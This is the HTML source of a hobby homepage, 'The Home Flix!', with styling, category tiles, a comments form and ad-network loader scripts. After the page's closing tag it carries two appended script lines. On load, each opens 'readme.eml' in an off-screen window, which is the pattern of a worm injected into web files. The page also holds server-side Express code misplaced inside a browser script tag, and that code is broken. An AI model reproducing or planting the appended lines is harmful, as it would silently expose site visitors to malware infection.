<!DOCTYPE html>
<html>
<head>
<script data-ad-client="ca-pub-6418371986422986" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-164222874-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-164222874-1');
</script>

<title>The Home Flix!</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="stay4.gif" />
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
<style>
* {
  box-sizing: border-box;
}
.menu {
  float: left;
  width: 20%;
}
.menuitem {
  padding: 8px;
  margin-top: 7px;
  border-bottom: 1px solid #f1f1f1;
}
.main {
  float: left;
  width: 60%;
  padding: 0 20px;
  overflow: hidden;
}
.right {
  background-color: lightblue;
  float: left;
  width: 20%;
  padding: 10px 15px;
  margin-top: 7px;
}

@media only screen and (max-width:800px) {
  /* For tablets: */
  .main {
    width: 80%;
    padding: 0;
  }
  .right {
    width: 100%;
  }
}
@media only screen and (max-width:500px) {
  /* For mobile phones: */
  .menu, .main, .right {
    width: 100%;
  }
}
</style>


<style>
body,h1,h2,h3,h4,h5 {font-family: "Poppins", sans-serif}
body {font-size: 16px;}
img {margin-bottom: -8px;}
.mySlides {display: none;}
</style>

<style>
html,body,h1,h2,h3,h4,h5,h6 {font-family: "Roboto", sans-serif;}
.w3-sidebar {
  z-index: 3;
  width: 250px;
  top: 43px;
  bottom: 0;
  height: inherit;
}

</style>
<style>
body,h1,h2,h3,h4,h5 {font-family: "Poppins", sans-serif}
body {font-size: 16px;}
img {margin-bottom: -8px;}
.mySlides {display: none;}
</style>

<style>
#myProgress {
  width: 100%;
  background-color: #blue;
}

#myBar {
  width: 10%;
  height: 30px;
  background-color: orange;
  text-align: center;
  line-height: 30px;
  color: white;
}
</style>
<style>
body {
  background-color: black;
  font-family: cursive;
}

.glow {

  color: #fff;
  text-align: center;
  -webkit-animation: glow 1s ease-in-out infinite alternate;
  -moz-animation: glow 1s ease-in-out infinite alternate;
  animation: glow 1s ease-in-out infinite alternate;
}

@-webkit-keyframes glow {
  from {
    text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #e60073, 0 0 40px #e60073, 0 0 50px #e60073, 0 0 60px #e60073, 0 0 70px #e60073;
  }

  to {
    text-shadow: 0 0 20px #fff, 0 0 30px #ff4da6, 0 0 40px #ff4da6, 0 0 50px #ff4da6, 0 0 60px #ff4da6, 0 0 70px #ff4da6, 0 0 80px #ff4da6;
  }
}

.container {
  position: relative;
  width: 50%;
}

.image {
  opacity: 1;
  display: block;
  width: 100%;
  height: auto;
  transition: .5s ease;
  backface-visibility: hidden;
}

.middle {
  transition: .5s ease;
  opacity: 0;
  position: relative;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%)
}

.container:hover .image {
  opacity: 0.95;
}

.container:hover .middle {
  opacity: 0.9;
}


.text {
border-radius: 20px;
  background-color: #ffa500;
  color: white;
  font-size: 20px;
  padding: 16px 32px;
}
img {
  border: 1px solid #ddd;
  border-radius: 4px;
  padding: 5px;
  width: 150px;
}

img:hover {
  box-shadow: 0 0 2px 1px rgba(0, 140, 186, 0.5);
}

</style>

<style>
.button {
  display: inline-block;
  padding: 15px 25px;
  font-size: 24px;
  cursor: pointer;
  text-align: center;
  text-decoration: none;
  outline: none;
  color: #fff;
  background-color: #FFA500;
  border: none;
  border-radius: 15px;
  box-shadow: 0 -3px #ADFF2F;
}

.button:hover {background-color: #FF0000}

.button:active {
  background-color: #ADFF2F;
  box-shadow: 0 5px #666;
  transform: translateY(4px);
}
.button span {
  cursor: pointer;
  display: inline-block;
  position: relative;
  transition: 0.5s;
}

.button span:after {
  content: '\00bb';
  position: absolute;
  opacity: 0;
  top: 0;
  right: -20px;
  transition: 0.5s;
}

.button:hover span {
  padding-right: 25px;
}

.button:hover span:after {
  opacity: 1;
  right: 0;
}
</style>





<style>
body {
  font-family: Verdana, sans-serif;
  margin: 0;
}

* {
  box-sizing: border-box;
}

.row > .column {
  padding: 0 8px;
}

.row:after {
  content: "";
  display: table;
  clear: both;
}

.column {
  float: left;
  width: 25%;
}

/* The Modal (background) */
.modal {
  display: none;
  position: fixed;
  z-index: 1;
  padding-top: 100px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  overflow: auto;
  opacity: 0.9;
  background-color: black;
   border-radius:10px;
}

/* Modal Content */
.modal-content {
  position: relative;
  background-color: #fefefe;
  margin: auto;
  padding: 0;
  width: 80%;
  max-width: 1200px;
  opacity:0.95;
}

/* The Close Button */
.close {
  color: white;
  position: absolute;
  top: 10px;
  right: 25px;
  font-size: 70px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #999;
  text-decoration: none;
  cursor: pointer;
}

.mySlides {
  display: none;
}

.cursor {
  cursor: pointer;
}

/* Next & previous buttons */

.next {
  cursor: pointer;
  position: absolute;
  top: 50%;
  width: auto;
  padding: 20px;
  margin-top: -50px;
  color: grey;
  font-weight: bold;
  font-size: 50px;
  transition: 0.6s ease;
  border-radius: 0 3px 3px 0;
  user-select: none;
  -webkit-user-select: none;
}

/* Position the "next button" to the right */
.next {
  right: 0;
  border-radius: 3px 0 0 3px;
}

/* On hover, add a black background color with a little bit see-through */
.prev:hover,
.next:hover {
  background-color: rgba(0, 0, 0, 0.8);
}

/* Number text (1/3 etc) */
.numbertext {
  color: #C0C0C0;
  font-size: 20px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

img {
  margin-bottom: -4px;
}

.caption-container {
  text-align: center;
  background-color: black;
  padding: 2px 16px;
  color: white;
}

.demo {
  opacity: 0.6;
}

.active,
.demo:hover {
  opacity: 0.5;
}

img.hover-shadow {
  transition: 0.3s;
}

.hover-shadow:hover {
  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}
</style>

<style>
.contained {
  position: relative;
  top: calc(50% - 150px);
  left: calc(50% - 150px);
  width: 500px;
  height: 200px;
margin-top: -100px; /* Negative half of height. */
margin-left: -250px; /* Negative half of width. */
  max-width: 400px;
  margin: 4em auto;
  background: #f36f21;
  border-radius: 20px;
  text-align: center;
  opacity:0.95;
  }


.hoveri {
	background-color: #FFF;
}
  </style>



  <style>
.button {
  display: inline-block;
  border-radius: 15px;
  background-color: #f4511e;
  border: none;
  color: #FFFFFF;
  text-align:center;
  font-size: 28px;
  padding: 10px;
  width: 200px;
  height: 50px;
  transition: all 0.5s;
  cursor: pointer;
  margin: 3px;

}

.button span {
  cursor: pointer;
  display: inline-block;
  position: relative;
  transition: 0.5s;
}

.button span:after {
  content: '\00bb';
  position: absolute;
  opacity: 0;
  top: 0;
  right: -20px;
  transition: 0.5s;
}

.button:hover span {
  padding-right: 24px;
}

.button:hover span:after {
  opacity: 1;
  right: 0;
}
</style>
<style>
.glowy {
  position: relative;
  top: calc(50% - 150px);
  left: calc(50% - 150px);
  width: 310px;
  height: 290px;
  border-radius: 50%;
  box-shadow:
    inset 0 0 50px #fff,
    inset 20px 0 80px #f0f,
    inset -20px 0 80px #0ff,
    inset 20px 0 300px #f0f,
    inset -20px 0 300px #0ff,
    0 0 50px #fff,
    -10px 0 80px #f0f,
    10px 0 80px #0ff;
}
</style>





<style>

@import url(https://fonts.googleapis.com/css?family=Open+Sans);

.search {
  width: 100%;
  position: relative;
  display: flex;
}

.searchTerm {
  width: 100%;
  border: 5px solid #00B4CC;
  border-right: none;
  padding: 5px;
  height: 40px;
  border-radius: 5px 0 0 25px;
  outline: none;
  color: #9DBFAF;
}

.searchTerm:focus{
  color: #00B4CC;
}

.searchButton {
  width: 55px;
  height: 39px;
  border: 10px solid #00B4CC;
  background: #00B4CC;
  text-align: center;
  color: #fff;
  border-radius: 0 5px 5px 0;
  cursor: pointer;
  font-size: 20px;
}

/*Resize the wrap to see the search bar change!*/
.wrap{
  width: 30%;
  position: relative;
  top: 50%;
  left: 80%;
  transform: translate(-50%, -50%);
}
</style>

<!comment style>


<style>

/* Button used to open the chat form - fixed at the bottom of the page */
.open-button {
  background-color: #555;
  background-image: url('star.gif');
  color: white;
  padding: 10px 15px;
  border: none;
  cursor: pointer;
  opacity: 0.9;
  border-radius: 10px;
  position: fixed;
  bottom: 1px;
  right: 1px;
  width: 280px;

}

/* The popup chat - hidden by default */
.chat-popup {
  display: none;
  position: fixed;
  bottom: 0;
  right: 15px;

  z-index:999;
}

/* Add styles to the form container */
.form-container {
  max-width: 300px;
  padding: 10px;
  background-color: grey;
  border-radius: 10px;
}

/* Full-width textarea */
.form-container textarea {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
  resize: none;
  min-height: 200px;
}

/* When the textarea gets focus, do something */
.form-container textarea:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/send button */
.form-container .btn {
  background-color: #4CAF50;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}

/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
</style>
<!comment  style over!>
<style>
#myBtn {
  background-color:orange;
  background-image: url('confy.gif');
  border-color:orange;
  border-radius: 10px;
  color:black;
}
.myBtn {


  border-radius: 3px;

}
</style>
<!dropdown>
<style>


.topnavy {
  position: fixed;
   z-index:999;
 top: 0;
 width: 100%;
}
</style>
<!dropdown>

<!dropdown>
<style>


.topnav {
  overflow: hidden;
  background-color: #333;

}

.topnav a {
  float: left;
  display: block;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.active {
  background-color: red;
  color: white;
  border-radius: 5px;
}

.topnav .icon {
  display: none;
}

.dropdown {
  float: left;
  overflow: hidden;
}

.dropdown .dropbtn {
  font-size: 17px;
  border: none;
  outline: none;
  color: white;
  padding: 14px 16px;
  background-color: inherit;
  font-family: inherit;
  margin: 0;
}

.dropdown-content {
  display: none;
  position: absolute;
  background-color: yellow;
  min-width: 160px;
  box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
  z-index: 1;
    border-radius: 3px;
}

.dropdown-content a {
  float: none;
  color: black;
  padding: 12px 16px;
  text-decoration: none;
  display: block;
  text-align: left;
}

.topnav a:hover, .dropdown:hover .dropbtn {
  background-color: #555;
  color: white;
}

.dropdown-content a:hover {
  background-color: #ddd;
  color: black;
}

.dropdown:hover .dropdown-content {
  display: block;
}

@media screen and (max-width: 600px) {
  .topnav a:not(:first-child), .dropdown .dropbtn {
    display: none;
  }
  .topnav a.icon {
    float: right;
    display: block;
  }
}

@media screen and (max-width: 600px) {
  .topnav.responsive {position: relative;}
  .topnav.responsive .icon {
    position: absolute;
    right: 0;
    top: 0;
  }
  .topnav.responsive a {
    float: none;
    display: block;
    text-align: left;
  }
  .topnav.responsive .dropdown {float: none;}
  .topnav.responsive .dropdown-content {position: relative;}
  .topnav.responsive .dropdown .dropbtn {
    display: block;
    width: 100%;
    text-align: left;
  }
}
</style>
<!dropdown>

</head>
<body background="bigbg3.jpg">

  <!Navbar >
<div class="topnavy">
  <div class="topnav" id="myTopnav">
  <a href="iindex.html" class="active">Home</a>
  <div class="dropdown">
     <button class="dropbtn">Categories
      <i class="fa fa-caret-down"></i>
    </button>
    <div class="dropdown-content">
    <a href="cashtemple.html">Money Temple</a>
      <a href="cooking.html">Cooking</a>
      <a href="bored.html">Passion</a>
   <a href="school.html">Scholarships</a>
      <a href="movies.html">Movies</a>
      <a href="hacker.html">Hacking</a>
   <a href="news.html">News</a>
      <a href="corona.html">Corona</a>
      <a href="redemption.html">Redemption</a>
    </div>
  </div>
  <a href="whatsapp://send?text=https://homeflix9.com" data-action="share/whatsapp/share" class="w3-bar-item w3-black w3-button w3-padding-20 myBtn " >Share via Whatsapp</a>
  <a href="about.html">About</a>

  <a href="javascript:void(0);" style="font-size:15px;" class="icon" onclick="myFunction()">&#9776;</a>
</div>
</div>

<script>
function myFunction() {
  var x = document.getElementById("myTopnav");
  if (x.className === "topnav") {
    x.className += " responsive";
  } else {
    x.className = "topnav";
  }
}
</script>


  </div>
  </div>


<!--<div align="center" class=" w3-hover-amber"
  <! <img src="skipadd.jpg" alt="HomeFlix9" style="width:70%;height:30%;">
<!</div>
<!<br>-->
<div>
<script type="text/javascript">
	atOptions = {
		'key' : '4b4fa360e74c514bf16000c82bab2f33',
		'format' : 'iframe',
		'height' : 250,
		'width' : 300,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://yy9s51b2u05z.com/4b4fa360e74c514bf16000c82bab2f33/invoke.js"></scr' + 'ipt>');
</script>
</div>
<! container 7>
 <div class="w3-col l3 m6 w3-hover-green w3-margin-bottom">
<a href="cashtemple.html">
<div align="center" class="w3-container w3-green">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="money1.gif" alt="Build A Bank!" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Rich</p>
       </div>
     </div>
   </div>

</a>
   <h2>MONEY TEMPLE</h2>
   <p>Learn & Make Money Online!!!</p>

 </div>
   </div>
   </div>
</div>



<! container 5>
 <div class="w3-col l3 m6 w3-hover-yellow w3-margin-bottom">
<a href="cooking.html">
<div align="center" class="w3-container w3-yellow">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="cooking1.gif" alt="Cooking!!" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Cookie</p>
       </div>
     </div>
   </div>
</a>

   <h2>COOKING CLASSES</h2>
   <p>Learn cooking Lets Make Some mess in the Kitchen!</p>
 </div>
   </div>
   </div>
</div>

<! container 3>
 <div class="w3-col l3 m6 w3-hover-brown w3-margin-bottom">
<a href="bored.html">
<div align="center" class="w3-container w3-brown">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="bored.gif" alt="Passion" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Passionate</p>
       </div>
     </div>
   </div>
</a>

   <h2>PASSION!!!</h2>
   <p>Passionate?Lets go find your passion...!!!</p>
 </div>
   </div>
   </div>
</div>
<! container 2>
 <div class="w3-col l3 m6 w3-hover-blue w3-margin-bottom">
<a href="school.html">
<div align="center" class="w3-container w3-blue">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="school3.gif" alt="Studies & Scholarship" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Literate</p>
       </div>
     </div>
   </div>
</a>

   <h2>SCHOLARSHIPS!</h2>
   <p>Also Get&Study All Notes Online+Library</p>
 </div>
   </div>
   </div>
</div>

<script type="text/javascript">
	atOptions = {
		'key' : '4b4fa360e74c514bf16000c82bab2f33',
		'format' : 'iframe',
		'height' : 250,
		'width' : 300,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.hiprofitnetworks.com/4b4fa360e74c514bf16000c82bab2f33/invoke.js"></scr' + 'ipt>');
</script>

<! container 4>
 <div class="w3-col l3 m6 w3-hover-purple w3-margin-bottom">
 <a href="movies.html">
<div align="center" class="w3-container w3-purple">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="movies.gif" alt="Home Cinemax" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Active</p>
       </div>
     </div>
   </div>
</a>

   <h2>MOVIES TIME!!!</h2>
   <p>Watch & Download Movies Allover The World!!!</p>
 </div>
   </div>
   </div>
</div>

<! container 6>
 <div class="w3-col l3 m6 w3-hover-pink w3-margin-bottom">
<a href="hacker.html">
<div align="center" class="w3-container w3-pink">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="hack1.gif" alt="Hacking Bases" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Cody</p>
       </div>
     </div>
   </div>
</a>

   <h2>HACKING BASEMENT!</h2>
   <p>Discover Deep Secrets Behind Computers...!</p>
 </div>
   </div>
   </div>
</div>
<! container 5>
 <div class="w3-col l3 m6 w3-hover-yellow w3-margin-bottom">
<a href="news.html">
<div align="center" class="w3-container w3-yellow">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="newz.gif" alt="World News" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Updated</p>
       </div>
     </div>
   </div>
</a>

   <h2>WORLD NEWS</h2>
   <p>Watch News & Global Updates!!</p>
 </div>
   </div>
   </div>
</div>



<! container 1>
 <div class="w3-col l3 m6 w3-hover-red w3-margin-bottom">
<a href="corona.html">
<div align="center" class="w3-container w3-red">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="corona2.gif" alt="Corona Trends" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Sanitized</p>
       </div>
     </div>
   </div>
</a>

   <h2>CORONA TRENDS!!!</h2>
   <p>Learn About Corona Virus,View Status,Take Action & Stay Safe!!!.</p>
 </div>
   </div>
   </div>
</div>


<! container 8>
 <div class="w3-col l3 m6 w3-hover-orange w3-margin-bottom">
<a href="redemption.html">
<div align="center" class="w3-container w3-orange">
   <div class="flip-card">
     <div class="w3-topbar w3-border-amber"></div>
     <div class="flip-card-inner">
       <div class="flip-card-front">

         <img src="redemption2.gif" alt="The Gospel" style="width:300px;height:300px;">
       </div>
       <div class="flip-card-back">
         <h1>Stay Home</h1>
         <p>Stay Safe</p>
         <p>Stay Holy</p>
       </div>
     </div>
   </div>
</a>

   <h2>REDEMPTION</h2>
   <p>Guys,I Guess It's Time We Go Back To God!</p>
 </div>
   </div>
   </div>
</div>

<!comment tainer>

<button class="open-button" onclick="openForm()">Comments & Complaints</button>

<div class="chat-popup" id="myForm">
  <form method="post" action="http://getcomments.000webhostapp.com/" class="form-container">
    <h1>Express Your Feelings!🤯</h1>

    <label for="name"><b>Name</b></label><br>
   <input type="text" name="name" class="inp" placeholder="Enter Your Name" required><br>


    <label for="msg"><b>Message Here🕴</b></label>
    <textarea placeholder="Type message.." name="msg" required></textarea>

    <button type="submit" class="btn">Send Message</button>
    <button type="button" class="btn cancel" onclick="closeForm()">Close I'm Done!</button>
  </form>
</div>

<script>
function openForm() {
  document.getElementById("myForm").style.display = "block";
}

function closeForm() {
  document.getElementById("myForm").style.display = "none";
}
</script>

<!comment tainer outro>

<div>
<br>
<div>
<script type="text/javascript">
	atOptions = {
		'key' : '4b4fa360e74c514bf16000c82bab2f33',
		'format' : 'iframe',
		'height' : 250,
		'width' : 300,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://yy9s51b2u05z.com/4b4fa360e74c514bf16000c82bab2f33/invoke.js"></scr' + 'ipt>');
</script>
</div>

<div align="left">

<script>
var counter = 0;
var app = require("express");
app.get("/",function(req,res){
 counter++;
 res.render("main.ejs",{counter});
});

app.listen(80);
</script>
</div>
<div class="w3-bar w3-coral w3-border w3-hover-light-pink">
  <a href="index.html" class="w3-bar-item w3-button w3-blue"><i class="fa fa-home"></i></a>
  <a href="https://accounts.google.com/ServiceLogin/identifier?hl=en&passive=true&continue=https%3A%2F%2Fwww.google.com%2F&flowName=GlifWebSignIn&flowEntry=AddSession" class="w3-bar-item w3-button" target="_blank"><i class="fa fa-envelope"></i></a>
  <a href="https://www.google.com/" class="w3-bar-item w3-button" target="_blank"><i class="fa fa-globe"></i></a>
</div>

</div>

<div class="w3-bar w3-tiny w3-black">

    <div class="w3-bar-item">
        </div><div align="center">
        <p id="demo"></p>

<script>
var d = new Date();
document.getElementById("demo").innerHTML = d;
</script>
</div>
    </div>
</div>



</body>
</html>

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
